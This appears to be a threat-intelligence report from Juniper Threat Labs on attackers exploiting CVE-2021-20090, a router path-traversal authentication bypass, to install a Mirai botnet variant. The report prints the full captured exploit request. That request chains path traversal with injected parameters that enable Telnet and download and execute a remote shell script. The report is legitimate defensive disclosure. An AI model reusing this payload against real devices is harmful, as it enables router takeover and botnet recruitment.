Juniper Threat Labs discovered an active exploitation of a vulnerability that was disclosed just few days ago.
CVE-2021-20090 is a vulnerability that was discovered by Tenable and made public on August 3, 2021.
This vulnerability potentially affects millions of home routers manufactured by no less than 17 vendors according to Tenable research, including some ISPs. The common thread between these devices seems to be firmware from Arcadyan.
A little video demo from the Buffalo writeup ( https://t.co/ySft5EP299 ) : pic.twitter.com/1ulDi0CyXZ
— evan grant (@stargravy) August 3, 2021
CVE-2021-20090 is a path traversal vulnerability that leads to an authentication bypass. When exploited, the attacker can take over control of the affected device.
As of August 5, Juniper Threat Labs identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China. The attacker seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar in name to the ones mentioned by Palo Alto Networks in March.
The research team had witnessed the same activity starting February 18. The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability. Given that most people may not even be aware of the security risk and won’t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.
Starting June 6, 2021, and through July 23, Juniper Threat Labs have noticed this threat actor start exploiting other vulnerabilities:
- CVE-2020-29557 (DLink routers)
- CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)
- CVE-2021-31755 (Tenda AC11)
- CVE-2021-22502 (MicroFocus OBR)
- CVE-2021-22506 (MicroFocus AM)
- a couple more exploits from exploit-db with no related CVEs.
The latest CVE exploitation, CVE-2021-20090 is probably not the last one to be added.
Attack Details
The initial attack originated from the IP address 27.22.80[.]19 over HTTP with the following POST method:
POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
As we can see from this POST request, the attacker will modify the configuration of the attacked device to enable Telnet using “ARC_SYS_TelnetdEnable=1” then proceeds to download a new script from the IP address 212.192.241[.]72 using either wget or curl and then executes it.
Juniper Threat Labs obtained a copy of the payload and confirmed it is a Mirai botnet variant. It was interesting to note that this botnet removes previous Mirai infections to clean the slate for itself.
